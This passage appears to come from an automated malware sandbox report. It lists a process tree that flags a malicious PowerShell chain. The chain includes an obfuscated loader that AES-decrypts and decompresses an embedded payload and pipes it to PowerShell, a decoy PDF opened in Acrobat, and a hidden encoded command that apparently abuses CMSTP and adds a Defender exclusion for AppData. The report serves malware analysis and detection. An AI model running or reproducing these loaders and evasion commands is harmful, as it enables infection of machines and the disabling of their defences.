8KzQJwZ2ajGmNR1DXUzkSQ7/vqXWCMUR/fIa3fOX8RPvhTIM/dyPCMB/BGNEUPy+OlwV319GmaGAFa+6BBgqOPQdfP70c/0Wp7jt9sGHLffv5E5Cq+42pFAyTHuhqbU+w6k9lx7hxTEuZmTea375G4VJvr/3SzC4ZU2fvI779LtGSSxG3HQf1SgiA3Ov9XBZlLSNqomBdB3wQg780RvWzg6FaNae63U9UxXmh6mT4MmuEq9oVWvs4rH3DgDZFK66itehJcnOCo54Qkl1udUJnmH6JzWqojLG7oP9HfzQnCuMt5Bymf8fJ8fH79dG0A8i5wU9c3jivVMpmUPq9iqyKXBocZp9XW+H6NtITPuGsh1YM8gIJNn8dwl8heqJAHOpdsXFrz05nBJm4GIXw99SFKrcOGHiJ9uTkhKjvadnuXzBbezP3vPjuKbooh3uzQCcOXz11yzFD63XBn8mInqDjWM0CInB/zU5DuCyaJSbj2XEkUGZst9mQ6y3+Bn4UXuae1XT8o7L5QMNJ/5tTChpC0OpS7Mr+EbHcDdICBqTGPhwPZ2EgSk6f2pZ2cV+dntlc3Jefz8g4BaBsBjx6derI7LVB4D8BetjfRKRYCzGKlJqR7GkTmwGkGzz6phFgYWs5Y3haUOxzgF+AAOatNjEVzYnQgNAuaYTjMaVMWSHm4fpTR5qwCn8iTcVhp4YEGrr8hAAi3wJDmQEsBZOBKYLB2X+pWGCqyXnB8IA9KSml1i7TSZTQbYF1h+24pRemchJrICUXt+QdSUnfQlQ8w7Pum98DTtdmhCalGXLrCC6m6M6cyJ80QS/yKP7vLIa/xWEjSnXNiBbU+ZihMC7QwDUhp4L9c3NZRg4xCvAjHI+b/dh1rSKxA1ksaEf7Ox6O2Yw5QI7b5lTr/vbJcLvu3FvgrACAEOtTZwWluIbl6zxhF9cmdzbpdYzoGaZhSS51aptQVBbzMacrbeSnUlLtNYc2zddsN7OnFGNNyjLFInxSyhw3EnXvfZIVUBADCG6C9aQHlm1Z3sgBWG5TJhCVTSKMtiyec8st59AdERXpSTgcTf9vRwZH9jrHcF1SnxFv4h0FDjiNSxyHxXy3cPHDqMTt8KOTrbWRIYsklQplbdREtEECDhm9hJOaB9sQ8cDFJepnvopvi0dg/l+TT1swnEsJ5DuRnbKVWNJAYHkEjYp4DTbngdD9CBKjSXPd6kK2n4/tgQDloBHrQa1EMJpkdv6SwaOi2uygeBwY/n1mrZ5iGJoV+/ZcjRWZF3+BbOcO0ynSuf4XoJnU0Rh1c1/ekdesi0+dJ0/6U+h7pADaqXtwFm4S0WJNUhSX9y7DmtATJCmxpp7ZBgRV/x0yX6SjF7iTJgLlx+Ah912X+0LqfBgdXyFanFXjtuQrlCyFZlwIUUcNnTDvmgPJmtnDtuA8uVrgTrgWwQVQPi0ppckVZEr/9Oi1i9BVGTvGdQoO7boNbtJbfQQuFAUkOaPJg40aEhWRVyswmUelAQydbkYIBMQxMmUe0AbSiRQOC0OIfuStdyrMtvJUnidZBbfW6Ut54Nf68qUCle3q/CLU2ielFC6xGS5Ys3ipfzNPRPIkaTPSyonkFk=';$btpxR = 'SWpMTGVGS3pWSmhZUUpvQ3BKSXpqekN5WUxhVUFYYnY=';$KnbSwfS = New-Object 'System.Security.Cryptography.AesManaged';$KnbSwfS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$KnbSwfS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$KnbSwfS.BlockSize = 128;$KnbSwfS.KeySize = 256;$KnbSwfS.Key = [System.Convert]::FromBase64String($btpxR);$oYMhb = [System.Convert]::FromBase64String($dmtaLinr);$mPaKTGQP = $oYMhb[0..15];$KnbSwfS.IV = $mPaKTGQP;$FhiroFtFu = $KnbSwfS.CreateDecryptor();$NoTWjrjwZ = $FhiroFtFu.TransformFinalBlock($oYMhb, 16, $oYMhb.Length - 16);$KnbSwfS.Dispose();$OLiGESXm = New-Object System.IO.MemoryStream( , $NoTWjrjwZ );$tKyJMRh = New-Object System.IO.MemoryStream;$zMSCVcgPp = New-Object System.IO.Compression.GzipStream $OLiGESXm, ([IO.Compression.CompressionMode]::Decompress);$zMSCVcgPp.CopyTo( $tKyJMRh );$zMSCVcgPp.Close();$OLiGESXm.Close();[byte[]] $gEHLvCXq = $tKyJMRh.ToArray();$NuGEx = [System.Text.Encoding]::UTF8.GetString($gEHLvCXq);$NuGEx | powershell -
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe $dmtaLinr = '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';$btpxR = 'SWpMTGVGS3pWSmhZUUpvQ3BKSXpqekN5WUxhVUFYYnY=';$KnbSwfS = New-Object 'System.Security.Cryptography.AesManaged';$KnbSwfS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$KnbSwfS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$KnbSwfS.BlockSize = 128;$KnbSwfS.KeySize = 256;$KnbSwfS.Key = [System.Convert]::FromBase64String($btpxR);$oYMhb = [System.Convert]::FromBase64String($dmtaLinr);$mPaKTGQP = $oYMhb[0..15];$KnbSwfS.IV = $mPaKTGQP;$FhiroFtFu = $KnbSwfS.CreateDecryptor();$NoTWjrjwZ = $FhiroFtFu.TransformFinalBlock($oYMhb, 16, $oYMhb.Length - 16);$KnbSwfS.Dispose();$OLiGESXm = New-Object System.IO.MemoryStream( , $NoTWjrjwZ );$tKyJMRh = New-Object System.IO.MemoryStream;$zMSCVcgPp = New-Object System.IO.Compression.GzipStream $OLiGESXm, ([IO.Compression.CompressionMode]::Decompress);$zMSCVcgPp.CopyTo( $tKyJMRh );$zMSCVcgPp.Close();$OLiGESXm.Close();[byte[]] $gEHLvCXq = $tKyJMRh.ToArray();$NuGEx = [System.Text.Encoding]::UTF8.GetString($gEHLvCXq);$NuGEx
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -
        7⤵
        Blocklisted process makes network request
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:428
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\Letter_Of_Intention.pdf"
        8⤵
        Checks processor information in registry
        Modifies Internet Explorer settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4824
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:3620
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=85E7D45D6D2513F31D24174842756B4E --mojo-platform-channel-handle=1700 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        10⤵
        
        PID:4820
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=6AE2A36FAF2946C5976403F50F37DB6C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=6AE2A36FAF2946C5976403F50F37DB6C --renderer-client-id=2 --mojo-platform-channel-handle=1732 --allow-no-sandbox-job /prefetch:1
        10⤵
        
        PID:628
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F5D6A3150AD274F37DC439A3936E34F4 --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        10⤵
        
        PID:3696
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BC09C026BC0D01DED33948D20D676576 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BC09C026BC0D01DED33948D20D676576 --renderer-client-id=5 --mojo-platform-channel-handle=1948 --allow-no-sandbox-job /prefetch:1
        10⤵
        
        PID:5116
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1A68AE068162D61AD455D700CA22217C --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        10⤵
        
        PID:1228
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E7AC1CC1F0C3252F98FBAFC00E5F5913 --mojo-platform-channel-handle=2360 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        10⤵
        
        PID:2244
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0ATgBhAG0AZQAgAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAFcAUABJAEEAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACcADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUABvAHMAdABNAGUAcwBzAGEAZwBlACgAaQBuAHQAIABoAFcAbgBkACwAIAB1AGkAbgB0ACAATQBzAGcALAAgAGkAbgB0ACAAdwBQAGEAcgBhAG0ALAAgAGkAbgB0ACAAbABQAGEAcgBhAG0AKQA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbwBuAHMAdAAgAGkAbgB0ACAAVwBNAF8AQwBIAEEAUgAgAD0AIAAwAHgAMAAxADAAMAA7AA0ACgAnAEAADQAKAEYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGkAcAB0ADoAUwBlAHQALQBJAE4ARgBGAGkAbABlACAAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACAAKAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACAAPQAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABDAE0AUwBUAFAALgBpAG4AZgAiACwAWwBTAHQAcgBpAG4AZwBdACQAQwBvAG0AbQBhAG4AZABUAG8ARQB4AGUAYwB1AHQAZQAgAD0AIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0ATgBvAEwAbwBnAG8AIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBOAG8AbgBJAG4AdABlAHIAYQBjAHQAaQB2AGUAIAAtAE4AbwBQAHIAbwBmAGkAbABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAFUAbgBSAGUAcwB0AHIAaQBjAHQAZQBkACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhADsAJwApACQASQBuAGYAQwBvAG4AdABlAG4AdAA9AEAAIgANAAoAWwB2AGUAcgBzAGkAbwBuAF0ADQAKAFMAaQBnAG4AYQB0AHUAcgBlACAAPQBgACQAYwBoAGkAYwBhAGcAbwBgACQADQAKAEEAZAB2AGEAbgBjAGUAZABJAE4ARgAgAD0AIAAyAC4ANQANAAoAWwBEA